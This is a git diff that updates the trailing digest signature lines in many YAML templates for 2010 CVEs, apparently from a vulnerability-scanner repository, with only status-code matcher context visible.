a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 234f1d4503..e13dabb9f8 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206802b8e72f542126e4ff23d7da65334f338cd4c0740d2ae4d1b9949fc89662a2022100bbdb399c323348837f18fc5994c724860ed0d98beca1f2b370d20b0ff05964ec:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201143c882fdc4cb9b905c911f1c2f656dec35166366565c4c06e796aaf806565702206d0ff3800e0d257ad2f5101ad4c8e1cc73f9e701736abdc61f2d443f1914ebc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 2bf5be9662..95e1240e59 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e1f2cf6994fa96b1c27f9d26f1ef29b42afe4af6fd70a2b0adb9df4670a991b0022034179c5c3550807c9a00f2e63c1ff0fcd5711ea9c47ff81f1a1be38b9bb5baf0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a01a9620bc62d111672b8cb22d5f16c8e9e18b8d5064bdc9c9931321a7ba9b500220065e6487a61086edf90ecb4da12b260b4d3d808a063b5926b689da0bf79f9b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 1ff96ddcdb..5cc738b2ae 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210088f4b08aa78ddccbf4567e403b80ae9ac6198c6fc352c936598255931333ce060220279ba74707dfb071d5ad933abd5cbf9c1264e7431b8f84c25ecffc0066f8d5b5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e31d6fa19d0e57e2967a104a804350bed077dab19223805a1d3730991e07662c022100c622f978057f820ef97fd2beecd754c00fc38268d423dad45f2a5d6eda773540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 332c24e1df..9d29d60388 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202d48352cf15ed126b000a77474e75f6453b6e3f04ba332114ac98f676dbd529b02204fd10f0778166d3694ae0887450bebe9fa8c9dd214ed0b9fdd2030f2704f3a38:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d2633f66eb9f521b07bbde5c1bfc0806e17f0ffe50c71deb409fde53af1f57a4022035fe2d2fc42d92c8d71b1acdae9a353625b11f1adfc216d0063cf08be3c597ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index e4433e02ff..6460404c1c 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e72ee512c6cef0d489d1c870a02e018b9f2adad5e2e13939b08141a5c993e65f022012fea2fd2f86105345a4551853467c8e317bed20d983192f98cb5b0ba67b4d31:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cf4fd795b521866ab44c8ee83d115a95a3db6900b476cccfbd1b792694fc9cf90220212e3207c873a4f7d59a1081d97acf76fbfb75c69794fa3b96168c3b3a1b82d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 0d1a362910..ad1915f63a 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a2ac888196d4cc2bd400f50eac9c0634c5f3d0ae0b8ed1f20ba199df0dcc6c53022100e7d088b7afb2696a5d28f79cc9e4ef3a45b275bf5d6d087cc4a7987366a52a27:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220355c7048659309812689dc312b531c919ddee71d9c9114f9a224967dda5460e9022063baf74534bf9f91a71a7e0390d887231729b04e0a1ba0693452ad5f4a6fb25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3b0ee43edc..2d0bb20e13 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205bd6cbca7904bc7ae1823c786b1f20d4adb97f75328e1294beb771bf742ae49b022100c805a7078985f08d62a74155597b2a139a5ed7120149e08fa02e95e0baecddb6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b6468f7eeac48668f9aec2cb812dd75eec50ba88aa3beac4d07cb87d3c5f1275022100a18e4d3bfe28960e9328439a1e847edf1cbfabc552be42dee33ba514ed08535e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 53e2ffabec..e8a08c40e3 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e169c7c29904712f58da2a9cb47241f51cc914874f550b4cbfa10d70487f3f5502210086beefb2a819ca920082f7b5f0a977092a8f20fd9625722d780c34e9ff729409:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204f2335608810281f5c39c8471e64fdc031e29a17b60197ab00d63f7bd9c5ea8b0221009c23754cef93d8de25d24d6ae95f4bc58e7ccbe03a97707a534836599ab7ec77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 9b44a200e1..36af2ba99d 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100885483aa6022f72b45c03785a8a0c8d0e3c304c1e4b78831d0bfc0c4c8833f6a02210096136f69f154cb7a1ca5afddd60a789aa79e17b252f815bc39b3a8262bba65ea:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206578eadd13e4322966142bef9e8096c9941de29ee9f1730d19763514a0188348022077a2be7abb554cf780e9a246ec5eb0c067160916e47672067378adad95810108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 2d3b16ad72..80c6619456 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022002f0eb867321bc72af6de090c597de28586df98bae3392392d2e6c9161b285d4022100da34d422e6106eb7f9cd7d63f496f3aecc530359b192196a76901ba5ffef5ed3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202d97dda3b7a05369904d259c1ccfcddbd8005def852fd67b2f93f575bc94b22d0220769e383aa53776b9a82d071e8ea3ba9187f7859db411f893b2bcc6bb1f199b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 10c579c5a1..c06f1a607c 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c05b04853124d94073ba8da9e5361cc5c4b798a6e38b7fb0bc199ba450975b8902204a78101c8f6a03fb4261021ca37d4ba4594b017235f493ec1075b2b82d28c9d7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c6862ca4b1cdb7113fc581c9eab699420385c10b56651d36847d9ace2c31d0fb02205baaa1e99c9cd1928508c58487a8c1c567c7a406d0c1716802bfb821fbb105c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 71dde7b077..1f9a3ab217 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206dd2f87a0547da7a66a95495af68678c8a8b45208cff8abb5893cb1d95d8fda9022100b2f914d7418e693e4e0e6a123c74710bbaf60998006bda6bffa1499d383d87bb:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022074b35951e1cc916862c1338b42415748b966be9754ab29d728d437b7038f7bed02204513aefbbd5550e484b21d7b7202ca2339544565e34fbc78fc12cbf53a6245d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 2a211d7b17..5d2e70d67b 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220723047f3fb4d7b8d5dda5acebacccd3bf08afaa80d4476ae165e1439292782bb022100edbaae3be5b1892c878dd2813ccab04dc2481210f8416d5311d3bb681d72c2c8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f63c630e8e092c94d05a0641f384375bc52396cf55220ece40c583ecba2fb4f402201352b16dd22a9e4aa78dd3b3d3885fe032e71712bab184272686c1121661cf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 1e582f7e41..77e65fe55a 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f7c55e801c3ee1d8ca602fa4812a79230d777f88b07e6169eb297bfad8630d08022100d8e24835903f1344539f20c507eff0294d005e7dcf94c70d75f0fdface5203a7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203a7ab21b1194f0b6495ca8a53735b94077d49fe508fba905dc9c89de9b6db54102210087e29394ecde58417a370d418d3052c4e16c69d5821c3ea323f7cfe5d0c9f5f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 7a75893dae..a2e6f1b7bb 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100976f2241b30edc62e9f1159da1775814a81703de08232f56dd42aa204010498c02206785131f8589656f3a0f4483ae2652c004ca6eef650691b810d6c9af9db1d958:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd24cd11b2a43074d5cd740ee0c261a394870d81d2f0148d1c043577ac6e9bb90220128c6cbcdf40fcfd402139485b43b6fccf89d94831f4604c1e3c59fe1254f431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index dc4549570f..323d95f260 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b48084c68eda0252ade343588bd0ab64031e345f423144572d024778b79062b3022100e0109a8a61fa08bb26c5977b45c03e9bf280500e2f23ebab14c281a92a25924e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c9004c66d456d2a1679c238be0111f698c9112736282c594bd05f2111efccde2022100d519c1f44728f667ce307acd8e1e6768356a636129d779964b7f35f0275b7d8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 637bc3cee1..7b2f7b5b0b 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220708bb84b309a59662724fc681960493029706d1d560c7f0b4adaba4db9ec4149022056fd59d2dbd6eb8991fa7b0f780e192f08baf241f2aef0132808575f3c534da8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200778af1cb0f946a4ee7c8a779b244b49a350737756161580ded62b0f2e4e59ce022020cdd7d1d46a20ea1f89de78cc3ff00b162a9fa138470035833d2498f24fd587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 0fb34345b3..ac1d8d6487 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100abe7885642923dbcf5f8410b004f69dc9e210706983dfd51dd4ba1c034bb98bf022019df85b766529e9bdf48ba7683fa85de3e101dd25f958c5e6ee081ada03864ad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008e372f9b3f506398449c1bade28e2a43de579ffaf0c5e77b1a39fb13de4b0af9022100a52f35dfa1e2e1896d734e194dbe7dc6ad3965dc9394165bd14c75721d139d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index a6526ebdc7..3971f53c31 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ef0c9a5019b3e1f6526be9b4efdece1b7375f2334149ee109f6eef60ad1230920221009169893f1e52deee0736a81ad1e95941609f28550637fc15c6e60e7fb7fbbbce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022070a3116cf4784caf26f572a56d0e7510a87ae2a55e9f7d2cad4c72b11bca2fd8022100ee7a67f483aa5d5d9c45d207109756729873a2395da3eac91f18cc0f942b4e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index e0f8da2084..277c446ac0 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220647618fadea572af78f75c760140a04bea497b06693d3a4c7e68a91feebeb84f02210081463dcc2b41130003b6a44a944a24d110c840420e443eecb9ca4b361af1c59e:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018ec71a42d4779ec092f84a4db496d4c1459b91ec312bb70d47c9baf09a343ee02202b398b7fe7ae0b43751ce5fd6cf3e7f53e25759260ad6b2b08fffe69e415d4f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 9ac81ea204..c624ac96aa 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220779c85d3fc74fb9dfefd04bd60908ac34e443240ce480df27dc2a66c6473bb2c022100d19a7575437c64a090728fc2d0378af203c5a2d8b1a3e2f23eccdd9ebc9f0130:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201dc4d992bcc5c71734e2367d9574fd9f0dc7129d3e3eee4fe9b0a65d4da42825022100b92d2859d4da524ca81772700c00f3833512b8bdf044da36d722b70f57f3fc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index c9c1c69ac6..a86d7392c5 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f2dcda55c893b54d4b2207e2006940c8adf2345a7421e936db1632a8579e51fe0221009b7adea893ee462795f0b465577407291f459d901fb1e156c0722c55c49a5aed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022017c8a0319ec8d9e2b554e09e4ab1e572cd132d0b4084b1e385f74bf21c2e7b77022100917194f2757b18607ab9083fee18511ee04faa2206403ef6e9f51ef716cc4bd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index 8d63f2f515..105bd17131 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203f846fe399383616d687adbceccc7a672a8ebcf5a84a3dcbf6492a7e8c2db63c02206fbb80e4b581103886fffa117007d3bdad342d3bdb23927012b087fab13f74df:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fed3545a96723222f97185f07822ef27208cd6a32efa7d8bc915a7b911bbbf57022047c095b602b394e4d62c27abd6c3fff35e33eded2dbd9d1a687a4e8adc56376d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 30020879f9..12098bfc9b 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022017f33032995830c2d773e312ceb7ffe10c9780f687c8ed7fdfba2ee141ae29aa02204efaf484897d845f4efd9b00fa35779e46877189fa5dc74b249b487bef29f046:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022037d92a8bb075d7bc96cc5cd4c5159833f398044ad329e585b877dd5204cad710022100940442779367621c666fa95cad011a035870cda17d1b643c31ca975960ba8612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 8f060f74e8..6709f4d6e9 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b90076e22d3f76df80214fba46f4e2ef240522cceac1703a54c3b1bb8f6f20d3022100c681528cdb823514b088010830a79a19204139cd1572343c0399dac62bd69870:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e4a4920144d5e179a6e52dcf940bc8eb80a97a749c375697b8710e534155430702207780b380e8d13abdc09f5b9e53d8d2ad16672b17ceda2297d818cad3d40acc1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 5736d1e87f..63f623d12c 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220694d0c7cd2db335a40a00adf906e77a793faed4e4cf8d9c24b09ca02fa5aed15022100e76f8582f20eae4635c28f52381965371a50ebb37d468f2e6c2124ae2284e069:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100daf8920f2a38f52c608080c8c706701e1bc2fa90a7b5485fde4c5b3eea5d3db802201af0f070f205f0cdefdcb1b1d8f2da6b6500c01835233838108af98ada17814a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 06e8a23196..56137996cc 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f7a4497a5535c2a4561d91e2603fdabbad999145bbc89b5b2b27b183fb4e857d022100d80fdf4eeff6b88af1af1f3186c00dd25eb4211509a01a8830d84a9f5897c2e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203262c47ef40d6f99a888fbea8c26e3f4b29d7d1feebf4a38438f44f8ceb538bf022100bcf4de92a91fd67f23e8e4ab7bf861ea909f7e2814d70a448c5e177558396bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 01f75b9126..7c1241a8f0 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203bd0d045d356f5f4514f749f45294c51396c3a3f65879cbae183d71b3998d62902202d85d9cca00d20f0391493ba570d76b1bf84ec7f7270db185a8b327a1f84a27c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d872061f0cef7f0154ace7e2ddb310b1d6a9f8a82762b5cb6e004fa4e75c9ce022070f30eabf68f3297b84c9c4d9242d7a2d1f2fa999cfcb28f762e24d0acb293ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 2c281c16d4..db8cd57e9c 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ce70ff6dd8bebabac5d6e6eff5e239d389e92cb5a9e120055133c2095517e1e3022100e4a15fd06978ab83623a33fd6d52ca5472fec40b1dbabb0aa5ae9c3cc932a7c9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eb8f04dbbb0a1daace047e260ae4d7a92f9609d55f7740a245e92d4a836cf080022100ba44b79bfe84b3139d1e22a7f4d9a6c0aa85d233583d9a3c05f3b2d8da6b0c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index b79445da58..207c50c457 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022003ee4e6d94319cdc8ce89ce5f325da3683d26a0411dae0b7658b05c909225a20022042005cd531789797d90d211c202314b0dd8d2469ffeed401b21b561dcb0e90d5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ac8898ed28bc3eab335cc0eb1bfaf66b40494d1229ca852545bc9ee44cf39597022018ddfa130e89942fefc7205ea37e277a467aafee5d6536ce72b49b36d2c0ff99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index e5f71dc64b..e3740b77ec 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207a87ac0488ec8bc7e977ce76c80dee9d676aaec1f21b6a6ed7d20247c28ee7360221008dc3c79656751ee65676c0c3018039a8f34bef0cc140044ec999b9a56dcf54dc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202cdb3d13f07d41f6881a3d0ea771e4f093cec337b1ef4163813abcc97fb01930022041d6a6c5b9cfc000224c68da804522cae6156fa4019b6ffee16d505797c258d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index a6124b7367..b0f8dacca7 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205b60db46ae518d345204bda9ad382ec6c0554df0fad7e91f02ed10744824a3b8022053e8678db404ce1c1e0144290b45d8572720210fcb09ebd7b9ebff4f1ecf8a07:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220748c31fdaee71b4fca6b1efb5b19e3ac79c907404f8c63afdaea0446b1bd636802205f8e94bea062b5999b9bfe180ca167cda59404733ea78a17b0bdd4b8772834dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 79ffab3d1a..d33fca7585 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008647a9eeeb1cb48c2dbe7b38d30234d6e6d398056318c16eecd493c6713b944002205bf385c5a1619e1d94aad86d40d8749a11fecef094b0e1baba78a854bfcd1dbc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c00495228188f4adf1445f80c68837a0df4bc05f6906e6fb51b4d6e79dac7c47022100e81c043e2cadc89baef43af4a3ce8ce244a2e5b8f4103cab3b47a348f7c29d05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 535d35b433..4da5a3eb40 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a8e47824e9b0f4e2bbe350cd7e4b4d88115c4a55683d36e5a800cd79b73765ee022100cd87b096ff4c18fad692e363ee3dbac7e8a856d74a8af98496c3528821becbf9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022031bce8d03593f5cb0072bf82e072493799a7c3d0bed24de9574cb7c093348822022100b61264a1c76f021693f2a7f4a93c9cee7f459678aecaf359dd8ac0eb220d6766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 73725a341a..e423449a8a 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -40,5 +40,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 490a004630440220128dccc77ce1fb4f7d3f884416b0bbb36362b7d540259b83bddf63cd09ac770b02202bb6671fa257c8f0624f3c45451b33672450cca91b4952bc1b1ef740f73ae1f1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203c2bb29b273408affeb0704562edaaa902c49bf8fed49186a7a5defde968d03102200f7540c83f0dde068366ac8ed5a717ecbde1c8d9ce2aad99e2095e2db55166c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 7f0a3ce4cf..5d41e6534c 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220276bd52298a058f6b94f0a6854e537ca1ac9a109aa73fedeab140ee3df2e6bcf022100b919e40627772c933e7166b0531630cfca7ecb9b68e1d5d3a8385af1b6c94ee5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202ec238e85b775350c4f546caa022ab3122a3f05a52979add36fbe51ae02c3939022100c439d5c86c6290318d015c85c7152fc12c676ac56cf4a73e1b0bb42b50de9e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 9d5a6322a6..b20ce5643d 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200bb2568137bcb730c462a3cb278ccebf286b569b3cd815f452f87e3adec48d66022100e865b73e44ec1102b6709f1c7f8647cecf853ea36271fe22e427bf51f2727cc0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049cb45da5e29115f29b4f1772b82409eb20592fc5b52ad921aa537dd1e1d4c57022100ed4130f7a27c9c432fa3f96b753ed8a1d427f8605361cfdacf584f93a2a1ff5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 8e864bcd7f..f4c12d4e0b 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 